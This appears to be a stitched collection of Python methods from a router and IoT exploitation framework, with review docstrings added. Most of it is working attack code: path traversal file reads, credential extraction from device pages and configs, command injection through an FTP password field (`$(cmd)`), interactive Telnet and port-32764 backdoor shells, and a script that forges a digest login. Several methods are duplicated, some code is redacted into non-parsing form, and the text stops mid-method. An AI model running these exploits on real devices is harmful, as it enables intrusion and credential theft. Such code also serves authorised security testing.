 def run(self):
     """Report the result of ``self.check()`` and print the URL to visit.

     On success the ``target:port`` base URL is printed so the operator can
     open the device in a browser; otherwise a failure message is printed.
     Returns None.
     """
     if not self.check():
         print_error("Target seems to be not vulnerable")
         return

     print_success("Target is vulnerable")
     base_url = "{}:{}".format(self.target, self.port)
     print_info("Visit: {}/\n".format(base_url))
    def run(self):
        """Read ``self.filename`` through the ``*errorpage*`` field of ``/cgi-bin/webproc``.

        A login-form POST is sent whose error-page parameter climbs out of the
        web root with a ``../`` chain and ends in the requested path. A 200
        reply is printed as the file contents; anything else is a failure.
        Returns None.
        """
        endpoint = "{}:{}/cgi-bin/webproc".format(self.target, self.port)
        traversal = "../../../../../../../../../../..{}".format(self.filename)
        # Field order is kept as in the original request body.
        form = {
            "getpage": "html/index.html",
            "*errorpage*": traversal,
            "var%3Amenu": "setup",
            "var%3Apage": "connected",
            "var%": "",
            "objaction": "auth",
            "%3Ausername": "******",
            "%3Apassword": "******",
            "%3Aaction": "login",
            "%3Asessionid": "abcdefgh",
        }

        reply = http_request(method="POST", url=endpoint, data=form)
        if reply is None:
            return

        if reply.status_code != 200:
            print_error("Exploit failed")
            return

        print_success("Exploit success")
        print_status("File: {}".format(self.filename))
        print_info(reply.text)
    def run(self):
        """Read ``self.filename`` via the ``html_response_page`` field of ``/apply.cgi``.

        After ``self.check()`` passes, a ``do_graph_auth`` POST is sent with
        ``..`` + the requested path as the response page; the request carries
        ``self.username``/``self.password`` in the ``auth=`` tuple. A 200 reply
        is printed as the file body. Returns None.
        """
        if not self.check():
            print_error("Exploit failed - target seems to be not vulnerable")
            return

        print_success("Target seems to be vulnerable")
        traversal = "..{}".format(self.filename)
        endpoint = "{}:{}/apply.cgi".format(self.target, self.port)
        # Field order is kept as in the original request body.
        form = {
            "html_response_page": traversal,
            "action": "do_graph_auth",
            "login_name": "test",
            "login_pass": "******",
            "&login_n": "test2",
            "log_pass": "******",
            "graph_code": "63778",
            "session_id": "test5",
            "test": "test",
        }

        print_status("Sending request payload using credentials: {} / {}".format(self.username, self.password))
        reply = http_request(method="POST", url=endpoint, data=form, auth=(self.username, self.password))
        if reply is None:
            return

        if reply.status_code != 200:
            print_error("Exploit failed - could not read response")
            return

        print_status("File: {}".format(self.filename))
        print_info(reply.text)
 def run(self):
     """Print the device base URL when ``self.check()`` reports it vulnerable.

     No request is made here; the operator is expected to continue in a
     browser. Returns None.
     """
     if not self.check():
         print_error("Target seems to be not vulnerable")
         return

     print_success("Target is vulnerable")
     base_url = "{}:{}".format(self.target, self.port)
     print_info("Visit: {}/\n".format(base_url))
    def run(self):
        """Read ``self.filename`` with a ``%5C..`` (URL-encoded backslash) traversal.

        One GET is sent. A missing reply is reported as a failure; a body
        carrying one of the known 404 markers means the file does not exist;
        an empty body is reported as such; otherwise the body is printed.
        Returns None.
        """
        if not self.check():
            print_error("Exploit failed - target seems to be not vulnerable")
            return

        print_success("Target seems to be vulnerable")

        target_url = "{}:{}/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C..{}" \
                     .format(self.target, self.port, self.filename)

        reply = http_request(method="GET", url=target_url)
        if reply is None:
            print_error("Exploit failed - could not read response")
            return

        print_status("Trying to read file: {}".format(self.filename))

        not_found_markers = ('Error 404 NOT_FOUND', 'Problem accessing', 'HTTP ERROR 404')
        body = reply.text
        if any(marker in body for marker in not_found_markers):
            print_status("File does not exist: {}".format(self.filename))
            return

        if not body:
            print_status("File seems to be empty")
            return

        print_info(body)
 def run(self):
     """Print ``self.configuration`` when ``self.check()`` reports the target vulnerable.

     ``self.configuration`` is not set here -- presumably ``check()`` fills it
     in; confirm against the rest of the module. Returns None.
     """
     if not self.check():
         print_error("Exploit failed - target does not appear vulnerable")
         return

     print_success("Target appears to be vulnerable")
     print_status("Dumping configuration...")
     print_info(self.configuration)
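 def hexdump(self, s):
     """Print ``s`` as a 16-bytes-per-row hex dump followed by a blank line.

     Each row is ``offset: <hex bytes> <printable ascii>``; anything outside
     0x20-0x7E is shown as ``.``. Elements of ``s`` may be one-character
     strings (a Python 2 ``str``) or ints (``bytes``/``bytearray`` on
     Python 3, ``bytearray`` on 2): both are normalised to ints first, so
     ``ord()`` is no longer applied to an int.
     """
     for offset in range(0, len(s), 16):
         row = [c if isinstance(c, int) else ord(c) for c in s[offset:offset + 16]]
         hex_part = ' '.join('%02X' % byte for byte in row)
         ascii_part = ''.join(chr(byte) if 32 <= byte <= 126 else '.' for byte in row)
         print_info('  %04x: %-48s %s' % (offset, hex_part, ascii_part))
     # Trailing blank line. The original used a bare ``print`` statement,
     # which is Python 2 only (on 3 it is a no-op expression); the rest of
     # this file emits blank lines with print_info().
     print_info()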
    def run(self):
        """Run every exploit module under ``self._exploits_directories`` on a thread pool.

        Each module is handed to ``self.target_function`` by a pool of
        ``self.threads`` workers; the workers are expected to fill
        ``self.vulnerabilities`` and ``self.not_verified``, which are reset
        here and listed once the pool has drained. If ``self.target`` parses
        as JSON it is replaced by the parsed value beforehand. Returns None.
        """
        self.vulnerabilities = []
        self.not_verified = []

        parsed_target = utils.safe_json_loads(self.target)
        if parsed_target:
            self.target = parsed_target

        with threads.ThreadPoolExecutor(self.threads) as pool:
            for exploit_dir in self._exploits_directories:
                for module in utils.iter_modules(exploit_dir):
                    pool.submit(self.target_function, module)

        print_info()
        if self.not_verified:
            print_status("Could not verify exploitability:")
            for entry in self.not_verified:
                print_info(" - {}".format(entry))

        print_info()
        if not self.vulnerabilities:
            print_error("Could not confirm any vulnerablity\n")
            return

        print_success("Device is vulnerable:")
        for entry in self.vulnerabilities:
            print_info(" - {}".format(entry))
        print_info()
 def run(self):
     """Print the ``/xslt`` URL for manual follow-up when ``self.check()`` passes.

     Nothing is requested here. Returns None.
     """
     if not self.check():
         print_error("Target seems to be not vulnerable")
         return

     print_success("Target is vulnerable")
     print_info("\nUse your browser:")
     print_info("{}:{}/xslt".format(self.target, self.port))
    def run(self):
        """Run ``check()`` of every module under ``utils.EXPLOITS_DIR`` against the target.

        Each exploit class is instantiated and given this scanner's ``target``
        and ``port``. A ``True`` verdict counts as vulnerable, ``False`` as not,
        anything else as unverified. Confirmed exploits are listed at the end.
        Returns None.
        """
        confirmed = []

        for exploit_cls in utils.iter_modules(utils.EXPLOITS_DIR):
            exploit = exploit_cls()
            exploit.target = self.target
            exploit.port = self.port

            verdict = exploit.check()
            if verdict is True:
                print_success("{} is vulnerable".format(exploit))
                confirmed.append(exploit)
            elif verdict is False:
                print_error("{} is not vulnerable".format(exploit))
            else:
                print_status("{} could not be verified".format(exploit))

        if not confirmed:
            print_error("Device is not vulnerable to any exploits!\n")
            return

        print_info()
        print_success("Device is vulnerable!")
        for exploit in confirmed:
            print_info(" - {}".format(exploit))
    def run(self):
        """Pull credentials out of ``/password.cgi`` and print them as a table.

        The page embeds ``pwdAdmin``/``pwdSupport``/``pwdUser`` JavaScript
        variables; each first match is base64-decoded and listed under its
        login name. Returns None.

        NOTE(review): the ``user`` pattern below has no capture group (its
        literal is redacted in this copy), so a match would be the whole
        ``pwdUser = ...`` text rather than the encoded value -- confirm
        against upstream.
        """
        if not self.check():
            print_error("Device seems to be not vulnerable")
            return

        page_url = "{}:{}/password.cgi".format(self.target, self.port)
        print_status("Requesting for {}".format(page_url))

        reply = http_request(method="GET", url=page_url)
        if reply is None:
            return

        patterns = (("admin", "pwdAdmin = '(.+?)'"),
                    ("support", "pwdSupport = '(.+?)'"),
                    ("user", "pwdUser = '******'"))

        found = []
        for login, pattern in patterns:
            matches = re.findall(pattern, reply.text)
            if matches:
                found.append((login, b64decode(matches[0])))

        if not found:
            print_error("Credentials could not be found")
            return

        print_success("Credentials found!")
        print_table(("Login", "Password"), *found)
        print_info("NOTE: Admin is commonly implemented as root")
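    def run(self):
        """Try Telnet first; fall back to FTP-config harvesting plus an HTTP digest bypass.

        ``self.telnet_login()`` returns the Telnet banner/prompt text:

        * ``Login not allowed`` with FTP open: the config is pulled with
          ``self.ftp_get_config()`` and, for each credential row, a JavaScript
          snippet is printed that computes the HTTP digest response from the
          stored hash so the operator can log in from the browser console.
        * ``}=>`` prompt: an interactive Telnet session is opened with
          ``self.remote_user``/``self.remote_pass``.
        * anything else: reported as not vulnerable.

        Returns None. The Telnet socket is now closed on every exit path of
        the interactive branch (``interact()`` only returns on EOF and the
        login writes can raise).
        """
        banner = self.telnet_login()

        if 'Login not allowed' in banner and self.is_port_opened(self.ftp_port):
            print_error("Telnet: {}:{} Authentication through Telnet not allowed".format(self.target, self.telnet_port))
            print_status("FTP and HTTP service active")
            creds = self.ftp_get_config()

            if creds:
                print_status("Use javascript console (through developer tools) to bypass authentication:")
                # NOTE(review): only one ``{}`` survives in this template (the
                # username literal is redacted in this copy), so str.format puts
                # user[0] into hash2 and silently drops user[3]; restore the
                # placeholder from upstream before relying on the output.
                payload = ('var user = "******"\n'
                           'var hash2 = "{}";\n'
                           'var HA2 = MD5("GET" + ":" + uri);\n'
                           'document.getElementById("user").value = user;\n'
                           'document.getElementById("hidepw").value = MD5(hash2 + ":" + nonce +":" + "00000001" + ":" + "xyz" + ":" + qop + ":" + HA2);\n'
                           'document.authform.submit();\n')

                for user in creds:
                    print_success("User: {} Role: {}".format(user[0], user[2]))
                    print_info(payload.format(user[0], user[3]))

        elif '}=>' in banner:
            print_success("Successful authentication through Telnet service")
            tn = telnetlib.Telnet(self.target, int(self.telnet_port), timeout=10)
            try:
                tn.read_until(': ')
                tn.write(self.remote_user + '\r\n')
                tn.read_until(': ')
                tn.write(self.remote_pass + '\r\n')
                tn.interact()
            finally:
                tn.close()
        else:
            print_error("Exploit failed - target seems to be not vulnerable")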
    def run(self):
        """Extract the base64-encoded passwords embedded in ``/password.cgi``.

        Looks for the ``pwdAdmin``/``pwdSupport``/``pwdUser`` variables, decodes
        the first match of each and prints a Login/Password table. Returns None.

        NOTE(review): the ``user`` pattern has no capture group (its literal is
        redacted in this copy), so ``findall`` would return the whole matched
        text, not the encoded value -- confirm against upstream.
        """
        if not self.check():
            print_error("Device seems to be not vulnerable")
            return

        page_url = "{}:{}/password.cgi".format(self.target, self.port)
        print_status("Requesting for {}".format(page_url))

        reply = http_request(method="GET", url=page_url)
        if reply is None:
            return

        patterns = (("admin", "pwdAdmin = '(.+?)'"),
                    ("support", "pwdSupport = '(.+?)'"),
                    ("user", "pwdUser = '******'"))

        found = []
        for login, pattern in patterns:
            matches = re.findall(pattern, reply.text)
            if matches:
                found.append((login, b64decode(matches[0])))

        if not found:
            print_error("Credentials could not be found")
            return

        print_success("Credentials found!")
        print_table(("Login", "Password"), *found)
        print_info("NOTE: Admin is commonly implemented as root")
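 def command_loop(self):
     """Interactive prompt: read a line, run it through ``self.execute``, print the result.

     ``exit``/``quit`` leave the loop (the other command loops in this file
     already do this; previously the only way out was EOF or Ctrl-C). A
     ``socket.timeout`` raised by ``execute`` is reported and the prompt is
     shown again instead of aborting the session.
     """
     while True:
         cmd = raw_input("cmd > ")

         if cmd in ['exit', 'quit']:
             return

         try:
             print_info(self.execute(cmd))
         except socket.timeout:
             print_error("No response received. The exploit tends to be unstable though. It is worth trying to run the same command again.")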
    def run(self):
        """Authenticate, then download ``self.path`` through the report viewer.

        A fresh ``requests.Session`` is stored on ``self.session`` for
        ``self.login()`` to use. On success
        ``/events/reports/view.cgi?download=1&files=../../..<path>%00`` is
        fetched on that session and printed unless the body is empty or carries
        the "not available to view" marker. Returns None.
        """
        self.session = requests.Session()

        if not self.check():
            print_error("Exploit failed. Target seems to be not vulnerable.")
            return

        print_success("Target seems to be vulnerable")
        print_status("Trying to authenticate")
        if not self.login():
            print_error("Exploit failed. Could not authenticate.")
            return

        traversal = "../../..{}".format(self.path)
        # The trailing %00 is part of the original payload -- presumably it
        # truncates a suffix the server appends; confirm against upstream.
        download_url = "{}:{}/events/reports/view.cgi?download=1&files={}%00".format(self.target, self.port, traversal)
        print_status("Requesting: {}".format(traversal))
        reply = http_request(method="GET", url=download_url, session=self.session)

        if reply is None:
            print_error("Exploit failed")
            return

        print_status("Reading response...")
        body = reply.text
        if not body or "empty or is not available to view" in body:
            print_error("Exploit failed. Empty response.")
        else:
            print_info(body)
 def run(self):
     """Print ``self.content`` when ``self.check()`` reports the target vulnerable.

     ``self.content`` is not set here -- presumably ``check()`` fills it in;
     confirm against the rest of the module. Returns None.
     """
     if not self.check():
         print_error("Exploit failed - target seems to be not vulnerable")
         return

     print_success("Target seems to be vulnerable")
     print_status("Dumping configuration...")
     print_info(self.content)
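 def hexdump(self, s):
     """Print ``s`` as a 16-bytes-per-row hex dump followed by a blank line.

     Each row is ``offset: <hex bytes> <printable ascii>``; anything outside
     0x20-0x7E is shown as ``.``. Elements of ``s`` may be one-character
     strings (a Python 2 ``str``) or ints (``bytes``/``bytearray`` on
     Python 3, ``bytearray`` on 2): both are normalised to ints first, so
     ``ord()`` is no longer applied to an int.
     """
     for offset in range(0, len(s), 16):
         row = [c if isinstance(c, int) else ord(c) for c in s[offset:offset + 16]]
         hex_part = ' '.join('%02X' % byte for byte in row)
         ascii_part = ''.join(chr(byte) if 32 <= byte <= 126 else '.' for byte in row)
         print_info('  %04x: %-48s %s' % (offset, hex_part, ascii_part))
     # Trailing blank line. The original used a bare ``print`` statement,
     # which is Python 2 only (on 3 it is a no-op expression); the rest of
     # this file emits blank lines with print_info().
     print_info()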
    def run(self):
        """Ask the ``urn:dslforum-org:service:UserInterface:1`` service for the login password.

        POSTs a ``GetLoginPassword`` SOAP envelope to ``/UD/?5`` and prints
        whatever comes back inside ``<NewUserpassword>``. Returns None.
        """
        soap_url = "{}:{}/UD/?5".format(self.target, self.port)
        soap_headers = {
            'SOAPACTION':
            '"urn:dslforum-org:service:UserInterface:1#GetLoginPassword"',
            'Content-Type': 'text/xml; charset="utf-8"',
            'Expect': '100-continue'
        }
        envelope = (
            "<?xml version=\"1.0\"?>"
            "<s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"
            "<s:Body>"
            "<m:GetLoginPassword xmlns:m=\"urn:dslforum-org:service:UserInterface:1\">"
            "</m:GetLoginPassword>"
            "</s:Body>"
            "</s:Envelope>")

        reply = http_request(method="POST",
                             url=soap_url,
                             headers=soap_headers,
                             data=envelope)
        if reply is None:
            return

        match = re.search('<NewUserpassword>(.*?)</NewUserpassword>', reply.text)
        if match is None:
            print_error("Exploit failed - could not find password")
            return

        print_success("Password has been found")
        print_info("Password: {}".format(match.group(1)))
 def run(self):
     """Print the ``/xslt`` URL for manual follow-up when ``self.check()`` passes.

     Nothing is requested here. Returns None.
     """
     if not self.check():
         print_error("Target seems to be not vulnerable")
         return

     print_success("Target is vulnerable")
     print_info("\nUse your browser:")
     print_info("{}:{}/xslt".format(self.target, self.port))
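    def run(self):
        """Try Telnet first; fall back to FTP-config harvesting plus an HTTP digest bypass.

        ``self.telnet_login()`` returns the Telnet banner/prompt text:

        * ``Login not allowed`` with FTP open: the config is pulled with
          ``self.ftp_get_config()`` and, for each credential row, a JavaScript
          snippet is printed that computes the HTTP digest response from the
          stored hash so the operator can log in from the browser console.
        * ``}=>`` prompt: an interactive Telnet session is opened with
          ``self.remote_user``/``self.remote_pass``.
        * anything else: reported as not vulnerable.

        Returns None. The Telnet socket is now closed on every exit path of
        the interactive branch (``interact()`` only returns on EOF and the
        login writes can raise).
        """
        banner = self.telnet_login()

        if 'Login not allowed' in banner and self.is_port_opened(self.ftp_port):
            print_error("Telnet: {}:{} Authentication through Telnet not allowed".format(self.target, self.telnet_port))
            print_status("FTP and HTTP service active")
            creds = self.ftp_get_config()

            if creds:
                print_status("Use javascript console (through developer tools) to bypass authentication:")
                # NOTE(review): only one ``{}`` survives in this template (the
                # username literal is redacted in this copy), so str.format puts
                # user[0] into hash2 and silently drops user[3]; restore the
                # placeholder from upstream before relying on the output.
                payload = ('var user = "******"\n'
                           'var hash2 = "{}";\n'
                           'var HA2 = MD5("GET" + ":" + uri);\n'
                           'document.getElementById("user").value = user;\n'
                           'document.getElementById("hidepw").value = MD5(hash2 + ":" + nonce +":" + "00000001" + ":" + "xyz" + ":" + qop + ":" + HA2);\n'
                           'document.authform.submit();\n')

                for user in creds:
                    print_success("User: {} Role: {}".format(user[0], user[2]))
                    print_info(payload.format(user[0], user[3]))

        elif '}=>' in banner:
            print_success("Successful authentication through Telnet service")
            tn = telnetlib.Telnet(self.target, int(self.telnet_port), timeout=10)
            try:
                tn.read_until(': ')
                tn.write(self.remote_user + '\r\n')
                tn.read_until(': ')
                tn.write(self.remote_pass + '\r\n')
                tn.interact()
            finally:
                tn.close()
        else:
            print_error("Exploit failed - target seems to be not vulnerable")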
    def command_loop(self):
        """Prompt for commands and print ``self.execute``'s output until ``exit``/``quit``.

        Every other line typed at ``cmd > `` is passed verbatim to
        ``self.execute`` and the return value printed. Returns None.
        """
        while True:
            line = raw_input("cmd > ")

            if line == 'exit' or line == 'quit':
                return

            print_info(self.execute(line))
    def execute(self, cmd):
        """Run ``cmd`` on the device by injecting it into the FTP test settings.

        Flow as visible here: GET ``/system.ini?loginuse&loginpas``, locate the
        magic byte sequence in the body, read the NUL-terminated username that
        starts 144 bytes past it, then store ``$(cmd)`` as the FTP password via
        ``set_ftp.cgi`` and trigger it with ``ftptest.cgi`` (both called with
        the recovered username/password). Command output is not captured; the
        method sleeps 2 s and returns ``""``.

        NOTE(review): the text between the username print and ``command_url``
        (the password extraction) is redacted to ``******`` in this copy, so the
        block as written does not parse -- restore it from upstream before use.
        Also: ``response`` is never checked for ``None``, and a missing magic
        sequence (``find()`` == -1) would start reading at offset 143.
        """
        # Get credentials
        print_status("Extracting credentials")
        credential_url = sanitize_url(
            "{}:{}/system.ini?loginuse&loginpas".format(
                self.target, self.port))
        response = http_request(method="GET", url=credential_url)
        # Find the magic sequence "0000 0a0a 0a0a 01"
        magic_sequence_location = response.content.find(
            b'\x00\x00\x0a\x0a\x0a\x0a\x01')
        # Skip ahead by 144 bytes to the beginning of username
        username_location = magic_sequence_location + 144
        # Read every byte in a loop until the first '\x00'
        # THIS WILL NOT WORK UNDER PYTHON 3 (bytearrays return ints in py3)!
        # Each iteration appends the current byte and then peeks at the next
        # one, so the NUL terminator itself is never appended.
        username_bytes = bytearray()
        next_username_byte = bytes()
        index = username_location
        while next_username_byte != b'\x00':
            username_bytes.append(response.content[index])
            next_username_byte = response.content[index + 1]
            index = index + 1
        username = username_bytes.decode('utf-8')
        # NOTE(review): redacted span below -- the password extraction and the
        # start of the command_url assignment were replaced by "******".
        print_info("Username: "******"Password: "******"{}:{}/set_ftp.cgi?next_url=ftp.htm&loginuse={}&loginpas={}&svr=192.168.1.1&port=21&user=ftp&pwd=$({})&dir=/&mode=PORT&upload_interval=0".format(
            self.target, self.port, username, password, cmd)
        http_request(method="GET", url=command_url)

        # Run command: ftptest.cgi makes the device use the stored FTP
        # settings, which is what executes the $(cmd) substitution.
        run_url = "{}:{}/ftptest.cgi?next_url=test_ftp.htm&loginuse={}&loginpas={}".format(
            self.target, self.port, username, password)
        http_request(method="GET", url=run_url)

        # No output channel: give the device time to run the command.
        time.sleep(2)
        return ""
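 def command_loop(self):
     """Interactive prompt: read a line, run it through ``self.execute``, print the result.

     ``exit``/``quit`` leave the loop (the other command loops in this file
     already do this; previously the only way out was EOF or Ctrl-C). A
     ``socket.timeout`` raised by ``execute`` is reported and the prompt is
     shown again instead of aborting the session.
     """
     while True:
         cmd = raw_input("cmd > ")

         if cmd in ['exit', 'quit']:
             return

         try:
             print_info(self.execute(cmd))
         except socket.timeout:
             print_error(
                 "No response received. The exploit tends to be unstable though. It is worth trying to run the same command again."
             )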
    def run(self):
        """Download ``/filename.gwc`` and print it when it looks like a config dump.

        Success requires a 200 reply whose body contains ``User Password``.
        Returns None.
        """
        config_url = "{}:{}/filename.gwc".format(self.target, self.port)

        reply = http_request(method="GET", url=config_url)
        if reply is None:
            return

        looks_like_config = reply.status_code == 200 and "User Password" in reply.text
        if not looks_like_config:
            print_error("Exploit failed - could not read configuration file")
            return

        print_success("Exploit success - reading configuration file filename.gwc")
        print_info(reply.text)
    def run(self):
        """Read ``self.filename`` via the ``file=`` parameter of ``/ccmivr/IVRGetAudioFile.do``.

        A long ``../`` chain is prepended to escape the audio directory; a
        non-empty 200 reply is printed as the file. Returns None.
        """
        audio_url = "{}:{}/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../..{}".format(self.target, self.port, self.filename)

        reply = http_request(method="GET", url=audio_url)
        if reply is None:
            return

        if reply.status_code != 200 or not reply.text:
            print_error("Exploit failed - could not read file")
            return

        print_success("Exploit success - reading file {}".format(self.filename))
        print_info(reply.text)
    def run(self):
        """Fetch ``/GatewaySettings.bin`` and print it when it carries the ``0MLog`` marker.

        Returns None.
        """
        settings_url = "{}:{}/GatewaySettings.bin".format(self.target, self.port)

        reply = http_request(method="GET", url=settings_url)
        if reply is None:
            return

        if reply.status_code != 200 or "0MLog" not in reply.text:
            print_error("Exploit failed. Device seems to be not vulnerable.")
            return

        print_success("Exploit success")
        print_status("Reading file GatewaySettings.bin")
        print_info(reply.text)
    def run(self):
        """Fetch ``/GatewaySettings.bin`` and print it when it carries the ``0MLog`` marker.

        Returns None.
        """
        settings_url = "{}:{}/GatewaySettings.bin".format(self.target, self.port)

        reply = http_request(method="GET", url=settings_url)
        if reply is None:
            return

        if reply.status_code != 200 or "0MLog" not in reply.text:
            print_error("Exploit failed. Device seems to be not vulnerable.")
            return

        print_success("Exploit success")
        print_status("Reading file GatewaySettings.bin")
        print_info(reply.text)
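    def command_loop(self):
        """Interactive shell over the service on TCP port 32764.

        One connection (30 s timeout) is opened and reused for every command;
        each line typed at ``cmd > `` is passed to ``self.execute(sock, 7, cmd)``
        and the reply printed. ``exit``/``quit`` end the loop. The socket is
        now closed on every exit path, including EOF/Ctrl-C at the prompt and
        a failed ``connect`` (previously only the exit/quit path closed it).
        The ``7`` is presumably the message type ``execute`` expects -- confirm
        against that method.
        """
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(30)
        try:
            sock.connect((self.target, 32764))

            while True:
                cmd = raw_input("cmd > ")

                if cmd in ['quit', 'exit']:
                    return

                print_info(self.execute(sock, 7, cmd.strip("\n")))
        finally:
            sock.close()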
    def run(self):
        """Read ``self.filename`` via the ``log=`` parameter of ``/BWT/utils/logs/read_log.jsp``.

        A ``../`` chain escapes the log directory; a non-empty 200 reply is
        printed as the file. Returns None.
        """
        log_url = "{}:{}/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../..{}".format(self.target, self.port, self.filename)

        reply = http_request(method="GET", url=log_url)
        if reply is None:
            return

        if reply.status_code != 200 or not reply.text:
            print_error("Exploit failed - could not read file")
            return

        print_success("Exploit success")
        print_status("Reading file: {}".format(self.filename))
        print_info(reply.text)
    def run(self):
        """Read ``self.filename`` via the ``file=`` parameter of ``/ccmivr/IVRGetAudioFile.do``.

        A long ``../`` chain is prepended to escape the audio directory; a
        non-empty 200 reply is printed as the file. Returns None.
        """
        audio_url = "{}:{}/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../..{}".format(
            self.target, self.port, self.filename)

        reply = http_request(method="GET", url=audio_url)
        if reply is None:
            return

        if reply.status_code != 200 or not reply.text:
            print_error("Exploit failed - could not read file")
            return

        print_success("Exploit success - reading file {}".format(
            self.filename))
        print_info(reply.text)
    def run(self):
        """Read ``self.filename`` via the ``log=`` parameter of ``/BWT/utils/logs/read_log.jsp``.

        A ``../`` chain escapes the log directory; a non-empty 200 reply is
        printed as the file. Returns None.
        """
        log_url = "{}:{}/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../..{}".format(
            self.target, self.port, self.filename)

        reply = http_request(method="GET", url=log_url)
        if reply is None:
            return

        if reply.status_code != 200 or not reply.text:
            print_error("Exploit failed - could not read file")
            return

        print_success("Exploit success")
        print_status("Reading file: {}".format(self.filename))
        print_info(reply.text)
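    def run(self):
        """Fetch the path stored in ``self.valid`` and print it.

        ``self.valid`` is not set here -- presumably ``self.check()`` stores
        the path it found exposed; confirm against that method. A non-empty
        200 reply is printed. A transport failure stays silent as before, but
        a non-200/empty reply is now reported instead of ending without any
        message (matching the sibling ``run`` methods in this file).
        Returns None.
        """
        if not self.check():
            print_error("Exploit failed - target seems to be not vulnerable")
            return

        url = "{}:{}{}".format(self.target, self.port, self.valid)

        print_status("Sending payload request")
        response = http_request(method="GET", url=url)
        if response is None:
            return

        if response.status_code == 200 and len(response.text):
            print_success("Exploit success")
            print_info(response.text)
        else:
            print_error("Exploit failed - could not retrieve response")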
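    def run(self):
        """Fetch the path stored in ``self.valid`` and print it.

        ``self.valid`` is not set here -- presumably ``self.check()`` stores
        the path it found exposed; confirm against that method. A non-empty
        200 reply is printed. A transport failure stays silent as before, but
        a non-200/empty reply is now reported instead of ending without any
        message (matching the sibling ``run`` methods in this file).
        Returns None.
        """
        if not self.check():
            print_error("Exploit failed - target seems to be not vulnerable")
            return

        url = "{}:{}{}".format(self.target, self.port, self.valid)

        print_status("Sending payload request")
        response = http_request(method="GET", url=url)
        if response is None:
            return

        if response.status_code == 200 and len(response.text):
            print_success("Exploit success")
            print_info(response.text)
        else:
            print_error("Exploit failed - could not retrieve response")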
    def run(self):
        """Fetch ``/.htpasswd`` from the web root and print its contents.

        NOTE(review): the body is printed regardless of status code or
        content; only a missing reply is treated as failure. Returns None.
        """
        if not self.check():
            print_error("Exploit failed - target seems to be not vulnerable")
            return

        print_success("Target seems to be vulnerable")

        htpasswd_url = "{}:{}/.htpasswd".format(self.target, self.port)
        reply = http_request(method="GET", url=htpasswd_url)
        if reply is None:
            print_error("Exploit failed - connection error")
            return

        # Layout reminder for the operator; see crypt(3):
        # http://man7.org/linux/man-pages/man3/crypt.3.html
        print_info("Unix crypt hash: $id$salt$hashed")
        print_success("Hash found:", reply.text)
    def run(self):
        """Recover the login credentials embedded in ``/system.ini``.

        Flow as visible here: after ``self.check()`` passes, GET
        ``/system.ini?loginuse&loginpas`` (directly via ``requests.get`` --
        not the file's ``http_request`` wrapper, so there is no ``None`` path
        and no timeout), find the magic byte sequence in the body, and read
        the NUL-terminated username starting 144 bytes past it.

        NOTE(review): the password extraction and the ``else`` branch after
        the username print are redacted to ``******`` in this copy, so the
        block as written does not parse -- restore from upstream before use.
        A missing magic sequence (``find()`` == -1) would start reading at
        offset 143.
        """
        if self.check():
            url = sanitize_url("{}:{}/system.ini?loginuse&loginpas".format(
                self.target, self.port))
            response = requests.get(url)
            print_info("Exploit succeeded, extracting credentials...")

            # May the lord forgive me for writing such spaghetti
            # Find the magic sequence "0000 0a0a 0a0a 01"
            magic_sequence_location = response.content.find(
                b'\x00\x00\x0a\x0a\x0a\x0a\x01')
            # Skip ahead by 144 bytes to the beginning of username
            username_location = magic_sequence_location + 144
            # Read every byte in a loop until the first '\x00'
            # THIS WILL NOT WORK UNDER PYTHON 3!
            # Each iteration appends the current byte and then peeks at the
            # next one, so the NUL terminator itself is never appended.
            username_bytes = bytearray()
            next_username_byte = bytes()
            index = username_location
            while next_username_byte != b'\x00':
                username_bytes.append(response.content[index])
                next_username_byte = response.content[index + 1]
                index = index + 1
            username = username_bytes.decode('utf-8')
            # NOTE(review): redacted span below -- the password extraction and
            # the not-vulnerable "else" branch were replaced by "******".
            print_success("Username: "******"Password: "******"Exploit failed. Device seems to be not vulnerable.")
    def run(self):
        """Read ``self.filename`` through the ``getpage`` parameter of ``/cgi-bin/webproc``.

        The requested path is passed verbatim as ``getpage`` together with the
        language/page parameters the endpoint expects; a non-empty 200 reply is
        printed as the file. Returns None.
        """
        if not self.check():
            print_error("Device seems to be not vulnerable")
            return

        page_url = "{}:{}/cgi-bin/webproc?getpage={}&var:language=es_es&var:page=".format(self.target, self.port, self.filename)

        reply = http_request(method="GET", url=page_url)
        if reply is None:
            return

        if reply.status_code != 200 or not reply.text:
            print_error("Exploit failed")
            return

        print_success("Success! File: %s" % self.filename)
        print_info(reply.text)
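    def run(self):
        """Try each path in ``self.resources`` and print the ones that expose a password.

        For every resource one GET is issued; a 200 reply whose body contains
        ``password`` is printed. A transport failure (``None`` reply) aborts
        the whole loop, as before. Returns None.

        Fix: the success branch called ``print_succcess`` (typo), which raised
        ``NameError`` exactly when the exploit worked; it now calls
        ``print_success`` like the sibling method in this file.
        """
        for resource in self.resources:
            url = "{}:{}{}".format(self.target, self.port, resource)

            print_status("Sending request to download sensitive information")
            response = http_request(method="GET", url=url)
            if response is None:
                return

            if response.status_code == 200 and "password" in response.text:
                print_success("Exploit success")
                print_status("Reading {} file".format(resource))
                print_info(response.text)
            else:
                print_error("Exploit failed - could not retrieve response")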
    def run(self):
        """Read ``self.filename`` with a plain ``/../../..`` traversal off the web root.

        A non-empty 200 reply is printed as the file. Returns None.
        """
        if not self.check():
            print_error("Device seems to be not vulnerable")
            return

        traversal_url = "{}:{}/../../../../../../../../../../../..{}".format(self.target, self.port, self.filename)

        reply = http_request(method="GET", url=traversal_url)
        if reply is None:
            return

        if reply.status_code != 200 or not reply.text:
            print_error("Exploit failed")
            return

        print_success("Success! File: %s" % self.filename)
        print_info(reply.text)
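    def run(self):
        """Read ``self.filename`` through ``/imc/report/DownloadReportSource``.

        The ``fileName`` parameter carries a backslash ``..\\`` chain after the
        expected report name; a non-empty 200 reply is printed as the file.
        Returns None.

        Fixes: the URL is now a raw string -- the original relied on ``\\.``
        being an unrecognised escape that Python keeps verbatim (a
        DeprecationWarning/SyntaxWarning on newer interpreters); the runtime
        value is unchanged. A non-200/empty reply is now reported instead of
        ending silently, matching the sibling ``run`` methods in this file.
        """
        if not self.check():
            print_error("Exploit failed - target seems to be not vulnerable")
            return

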